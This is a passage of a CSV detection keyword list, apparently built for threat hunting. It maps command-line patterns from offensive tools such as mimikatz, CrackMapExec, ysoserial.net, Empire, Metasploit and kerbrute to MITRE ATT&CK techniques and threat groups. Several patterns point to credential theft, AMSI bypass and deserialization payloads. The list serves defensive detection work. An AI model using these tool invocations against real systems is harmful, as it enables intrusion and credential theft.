APT29","C2","https://github.com/uknowsec/TailorScan","1","0","N/A","10","10","269","49","2020-11-12T08:29:11Z","2020-11-09T07:38:16Z" +"* -p * --amsi-bypass *","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* -p * -d *.dll -e OpenProcess*","offensive_tool_keyword","ThreadlessInject","Threadless Process Injection using remote function hooking.","T1055.012 - T1055.003 - T1177","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/CCob/ThreadlessInject","1","0","N/A","10","6","553","55","2023-02-23T10:23:56Z","2023-02-05T13:50:15Z" +"* -p *\mimi.out*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - 
T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" +"* -p 1337:1337 -p 5000:5000*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - 
Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"* -p 4644 -n mal*","offensive_tool_keyword","Gotato","Generic impersonation and privilege escalation with Golang. Like GenericPotato both named pipes and HTTP are supported.","T1003.003 - T1056.002 - T1550.001 - T1090","TA0005 - TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/iammaguire/Gotato","1","0","N/A","9","2","114","16","2021-06-07T21:19:58Z","2021-06-05T22:32:48Z" +"* -p 'aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0'*","offensive_tool_keyword","ad-ldap-enum","An LDAP based Active Directory user and group enumeration tool","T1087 - T1087.001 - T1018 - T1069 - T1069.002","TA0007 - TA0003 - TA0004","N/A","N/A","AD Enumeration","https://github.com/CroweCybersecurity/ad-ldap-enum","1","0","blank lmhash","6","3","290","72","2023-02-10T19:07:34Z","2015-08-25T19:38:39Z" +"* -p ActivatorUrl*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" +"* -p Altserialization*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" +"* -p CommonsCollections1 -c whoami*","offensive_tool_keyword","pysoserial","Python-based proof-of-concept tool for generating payloads that utilize unsafe Java object deserialization.","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - 
TA0008","N/A","N/A","shell spawning","https://github.com/aStrowxyu/Pysoserial","1","0","N/A","9","1","9","1","2021-12-06T07:41:55Z","2021-11-16T01:55:31Z" +"* -p DotNetNuke*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" +"* -p LastLogonTimestamp -p LastLogonUserName *","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for lateral movement and credential gathering without requiring access to the SCCM administration console GUI","T1003 - T1021 - T1056 - T1059 - T1075 - T1078 - T1087 - T1098 - T1105 - T1110 - T1212 - T1547 - T1552 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/Mayyhem/SharpSCCM/","1","0","N/A","N/A","5","412","53","2023-09-16T17:33:11Z","2021-08-19T05:09:19Z" +"* -p powershell -i *.ps1 -o *.vba*","offensive_tool_keyword","MaliciousMacroMSBuild","Generates Malicious Macro and Execute Powershell or Shellcode via MSBuild Application Whitelisting Bypass.","T1059.001 - T1059.003 - T1127 - T1027.002","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/MaliciousMacroMSBuild","1","0","N/A","8","5","488","117","2019-08-06T08:16:05Z","2018-04-09T23:16:30Z" +"* -p SessionSecurityTokenHandler*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" +"* -p shellcode -i *.bin -o 
*.vba*","offensive_tool_keyword","MaliciousMacroMSBuild","Generates Malicious Macro and Execute Powershell or Shellcode via MSBuild Application Whitelisting Bypass.","T1059.001 - T1059.003 - T1127 - T1027.002","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/MaliciousMacroMSBuild","1","0","N/A","8","5","488","117","2019-08-06T08:16:05Z","2018-04-09T23:16:30Z" +"* -p test_passwords.txt*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* -p TransactionManagerReenlist*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" +"*' p::d '*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"* -p:AssemblyName=inveigh*","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","0","N/A","10","10","2212","441","2023-06-13T01:36:42Z","2015-04-02T18:04:41Z" +"* p2p-conficker.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* --pacu-help*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"* papacat.ps1*","offensive_tool_keyword","JustEvadeBro","JustEvadeBro a cheat sheet which will aid you through AMSI/AV evasion & bypasses.","T1562.001 - T1055.012 - T1218.011","TA0005 - TA0040 - TA0010","N/A","N/A","Defense Evasion","https://github.com/sinfulz/JustEvadeBro","1","0","N/A","8","3","260","25","2023-03-30T06:22:24Z","2021-05-11T06:26:10Z" 
+"* parrot main *","offensive_tool_keyword","parrot os","Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation OS","https://www.parrotsec.org/download/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* parrot.run/*","offensive_tool_keyword","parrot os","Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation OS","https://www.parrotsec.org/download/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* parrot-backports *","offensive_tool_keyword","parrot os","Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation OS","https://www.parrotsec.org/download/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* parrot-security *","offensive_tool_keyword","parrot os","Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. 
penetration testing and digital forensics.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation OS","https://www.parrotsec.org/download/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* password.lst*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* -PasswordList *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens 
- Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-SMBAutoBrute.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* --password-list *","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" +"* --password-not-required --kdcHost *cme*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* passwordspray -d *","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","0","N/A","N/A","10","2145","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" +"* path-mtu.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* -pathToBloodHoundGraph * -pathToOutputGoFetchPath * -pathToAdditionalPayload *","offensive_tool_keyword","GoFetch","GoFetch is a tool to automatically exercise an attack plan generated by the BloodHound application.","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Exploitation tools - AD Enumeration","https://github.com/GoFetchAD/GoFetch","1","0","N/A","10","7","615","126","2017-06-20T14:15:10Z","2017-04-11T10:45:23Z" +"* -PathToDMP *.dmp*","offensive_tool_keyword","powerextract","This tool is able to parse memory dumps of the LSASS process without any additional tools (e.g. Debuggers) or additional sideloading of mimikatz. 
It is a pure PowerShell implementation for parsing and extracting secrets (LSA / MSV and Kerberos) of the LSASS process","T1003 - T1055 - T1003.001 - T1055.012","TA0007 - TA0002","N/A","N/A","Credential Access","https://github.com/powerseb/PowerExtract","1","0","N/A","N/A","1","99","14","2023-07-19T14:24:41Z","2021-12-11T15:24:44Z" +"* -PathToGraph *.json -PathToPayload *.exe*","offensive_tool_keyword","GoFetch","GoFetch is a tool to automatically exercise an attack plan generated by the BloodHound application.","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Exploitation tools - AD Enumeration","https://github.com/GoFetchAD/GoFetch","1","0","N/A","10","7","615","126","2017-06-20T14:15:10Z","2017-04-11T10:45:23Z" +"* -Payload * -method sysprep*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"* --payload * --platform windows*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"* -payload *-Lhost *-Lport*","offensive_tool_keyword","empire","Empire scripts arguments. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* payload add *","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","0","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" +"* --payload CommonsCollections*","offensive_tool_keyword","pysoserial","Python-based proof-of-concept tool for generating payloads that utilize unsafe Java object deserialization.","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - 
TA0008","N/A","N/A","shell spawning","https://github.com/aStrowxyu/Pysoserial","1","0","N/A","9","1","9","1","2021-12-06T07:41:55Z","2021-11-16T01:55:31Z" +"* payload start *","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","0","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" +"* --payload_file * --payload_path*","offensive_tool_keyword","vRealizeLogInsightRCE","POC for VMSA-2023-0001 affecting VMware vRealize Log Insight which includes the following CVEs: VMware vRealize Log Insight Directory Traversal Vulnerability (CVE-2022-31706) VMware vRealize Log Insight broken access control Vulnerability (CVE-2022-31704) VMware vRealize Log Insight contains an Information Disclosure Vulnerability (CVE-2022-31711)","T1190 - T1071 - T1003 - T1069 - T1110 - T1222","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/horizon3ai/vRealizeLogInsightRCE","1","0","Added to cover the POC exploitation used in massive ransomware campagne that exploit public facing Vmware ESXI product ","N/A","2","147","24","2023-01-31T11:41:08Z","2023-01-30T22:01:08Z" +"* --payloadcookie *","offensive_tool_keyword","SharpSocks","Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell","T1090 - T1021.001","TA0002","N/A","N/A","C2","https://github.com/nettitude/SharpSocks","1","0","N/A","10","10","453","89","2023-03-15T19:19:30Z","2017-11-10T13:29:08Z" +"* --payload-file pwn.bat*","offensive_tool_keyword","SplunkWhisperer2","Local privilege escalation or remote code execution through Splunk Universal Forwarder (UF) misconfigurations","T1068 - T1059.003 - T1071.001","TA0003 - TA0002 - TA0011","N/A","N/A","Lateral 
Movement - Privilege Escalation","https://github.com/cnotin/SplunkWhisperer2","1","0","N/A","9","3","239","53","2022-09-30T16:41:17Z","2019-02-24T18:05:51Z" +"* -PayloadPath *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-BypassUAC.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* PayloadsDirectory*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - 
T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"* payloadtests.py*","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","0","N/A","10","10","3186","809","2023-08-14T02:52:06Z","2013-05-30T01:04:24Z" +"* PayloadType.BIND_TCP*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","0","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"* --payload-types all*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","0","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" +"* --payload-types bin*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 